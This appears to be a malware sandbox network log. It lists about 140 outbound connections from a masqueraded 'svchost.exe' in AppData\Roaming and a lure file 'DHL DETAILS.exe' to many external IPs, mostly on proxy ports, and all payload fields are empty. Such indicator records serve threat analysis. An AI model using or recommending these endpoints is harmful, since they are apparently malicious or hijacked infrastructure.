Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5925	192.168.2.5	57415	178.128.157.114	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5926	192.168.2.5	55856	36.134.91.82	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5927	192.168.2.5	56536	185.118.153.110	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5928	192.168.2.5	57001	162.241.6.97	60651	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5929	192.168.2.5	57159	104.16.105.198	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5930	192.168.2.5	62581	66.228.35.209	14321	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5931	192.168.2.5	56887	43.163.192.3	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5932	192.168.2.5	57010	13.59.156.167	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5933	192.168.2.5	56890	72.195.34.58	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5934	192.168.2.5	56748	159.223.71.71	60512	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5935	192.168.2.5	57210	104.20.75.69	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5936	192.168.2.5	56790	150.109.243.156	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5937	192.168.2.5	57228	203.32.120.202	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5938	192.168.2.5	57235	172.67.127.188	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5939	192.168.2.5	57482	43.153.172.76	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5940	192.168.2.5	57494	43.153.172.76	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5941	192.168.2.5	57501	43.153.172.76	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5942	192.168.2.5	57524	43.153.172.76	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5943	192.168.2.5	57116	38.54.6.39	9080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5944	192.168.2.5	56949	147.75.92.251	9401	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5945	192.168.2.5	56878	114.132.202.78	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5946	192.168.2.5	57107	184.170.249.65	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5947	192.168.2.5	56963	211.222.252.187	8197	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5948	192.168.2.5	56987	185.212.60.62	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5949	192.168.2.5	56894	160.16.90.35	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5950	192.168.2.5	56936	185.219.133.106	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5951	192.168.2.5	57050	51.20.50.149	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5952	192.168.2.5	57398	104.16.105.146	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5953	192.168.2.5	56885	43.133.136.208	8800	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5954	192.168.2.5	57308	104.18.44.93	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5955	192.168.2.5	56992	65.109.152.88	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5956	192.168.2.5	57089	18.133.16.21	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5957	192.168.2.5	57384	172.67.181.103	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5958	192.168.2.5	62533	148.72.215.230	44387	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5959	192.168.2.5	57119	64.137.93.62	6519	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5960	192.168.2.5	64734	159.203.13.121	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5961	192.168.2.5	62537	103.165.234.46	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5962	192.168.2.5	57423	188.114.99.37	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5963	192.168.2.5	57062	103.83.232.122	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5964	192.168.2.5	57082	93.90.212.2	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5965	192.168.2.5	57220	37.187.77.58	21861	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5966	192.168.2.5	57392	34.135.203.172	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5967	192.168.2.5	56336	117.160.250.163	81	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5968	192.168.2.5	64665	91.134.140.160	32896	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5969	192.168.2.5	57168	173.249.29.243	9123	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5970	192.168.2.5	56889	122.114.232.137	808	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5971	192.168.2.5	57039	89.218.8.152	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5972	192.168.2.5	56957	60.12.168.114	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5973	192.168.2.5	57177	113.208.119.142	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5974	192.168.2.5	57255	209.126.104.38	40750	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5975	192.168.2.5	50786	38.54.2.168	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5976	192.168.2.5	55016	171.244.140.160	53749	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5977	192.168.2.5	57131	43.155.170.35	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5978	192.168.2.5	57268	45.196.151.59	5432	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5979	192.168.2.5	57189	185.101.16.52	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5980	192.168.2.5	50502	42.193.58.96	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5981	192.168.2.5	57352	13.40.239.130	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5982	192.168.2.5	57511	104.16.72.45	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5983	192.168.2.5	57213	103.118.46.177	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5984	192.168.2.5	57229	119.23.148.173	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5985	192.168.2.5	52734	67.201.59.70	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5986	192.168.2.5	57401	82.113.157.122	31280	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5987	192.168.2.5	64788	4.236.183.37	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5988	192.168.2.5	57680	172.67.150.173	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5989	192.168.2.5	57660	162.159.242.252	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5990	192.168.2.5	57788	104.21.64.208	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5991	192.168.2.5	57744	172.67.182.126	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5992	192.168.2.5	57298	161.97.74.176	30000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5993	192.168.2.5	57287	139.224.64.191	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5994	192.168.2.5	57310	91.189.177.188	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5995	192.168.2.5	57402	1.15.62.12	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5996	192.168.2.5	57727	38.162.3.74	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5997	192.168.2.5	57353	49.4.48.128	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5998	192.168.2.5	55263	37.187.91.192	27898	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5999	192.168.2.5	57841	104.25.135.170	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6000	192.168.2.5	57315	65.1.244.232	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6001	192.168.2.5	57428	190.103.177.131	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6002	192.168.2.5	57884	209.97.150.167	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6003	192.168.2.5	55269	134.209.105.209	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6004	192.168.2.5	55251	41.33.203.234	1975	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6005	192.168.2.5	57251	42.49.148.167	9001	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6006	192.168.2.5	57594	47.243.92.199	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6007	192.168.2.5	57502	88.79.243.103	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6008	192.168.2.5	57564	123.57.246.163	8118	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6009	192.168.2.5	57431	195.87.217.75	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6010	192.168.2.5	57672	147.75.34.86	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6011	192.168.2.5	57733	3.123.150.192	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6012	192.168.2.5	57580	201.13.147.161	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6013	192.168.2.5	54124	153.139.233.218	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6014	192.168.2.5	51129	183.88.46.37	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6015	192.168.2.5	57820	185.49.30.5	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6016	192.168.2.5	57778	91.189.177.186	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6017	192.168.2.5	55546	212.110.188.220	34409	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6018	192.168.2.5	57625	178.128.113.118	23128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6019	192.168.2.5	57781	120.26.0.11	8880	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6020	192.168.2.5	57949	104.27.83.183	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6021	192.168.2.5	57611	60.205.132.71	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6022	192.168.2.5	57828	62.33.207.202	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6023	192.168.2.5	57768	52.172.1.186	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6024	192.168.2.5	57829	178.54.21.203	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6025	192.168.2.5	57529	222.138.76.6	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6026	192.168.2.5	57699	103.66.177.17	32251	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6027	192.168.2.5	51219	175.183.82.221	8197	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6028	192.168.2.5	57816	103.190.54.141	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6029	192.168.2.5	55860	167.99.124.118	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6030	192.168.2.5	57970	104.21.124.121	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6031	192.168.2.5	56655	74.119.144.60	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6032	192.168.2.5	57125	111.53.178.249	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6033	192.168.2.5	51593	203.161.32.218	50640	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6034	192.168.2.5	64853	132.148.245.112	38117	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6035	192.168.2.5	57886	103.190.54.141	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6036	192.168.2.5	64958	192.99.207.129	44523	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6037	192.168.2.5	58046	104.27.15.161	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6038	192.168.2.5	57962	150.109.243.156	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6039	192.168.2.5	57967	211.222.252.187	8197	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6040	192.168.2.5	56064	51.15.254.129	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6041	192.168.2.5	50319	103.97.179.115	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6042	192.168.2.5	64858	12.186.205.120	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6043	192.168.2.5	56743	199.102.106.94	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6044	192.168.2.5	57921	139.129.202.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6045	192.168.2.5	64912	62.171.169.37	58402	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6046	192.168.2.5	51368	45.11.95.166	6015	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6047	192.168.2.5	57950	185.38.111.1	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6048	192.168.2.5	57935	61.178.152.31	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6049	192.168.2.5	57948	115.74.157.191	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6050	192.168.2.5	52091	27.65.114.8	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6051	192.168.2.5	55679	138.2.73.157	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6052	192.168.2.5	57997	39.108.227.108	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6053	192.168.2.5	51607	172.93.111.87	43209	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6054	192.168.2.5	57929	72.49.49.11	31034	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6055	192.168.2.5	51567	158.160.49.255	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6056	192.168.2.5	51317	105.112.140.218	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6057	192.168.2.5	56458	51.79.87.144	8533	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6058	192.168.2.5	58072	13.40.239.130	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6059	192.168.2.5	56384	219.71.216.78	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6060	192.168.2.5	64834	41.70.12.54	5678	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6061	192.168.2.5	58105	20.210.113.32	8123	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6062	192.168.2.5	58047	45.117.179.179	14791	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6063	192.168.2.5	58069	185.101.16.52	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6064	192.168.2.5	58109	80.169.243.234	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6065	192.168.2.5	51869	143.110.232.177	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
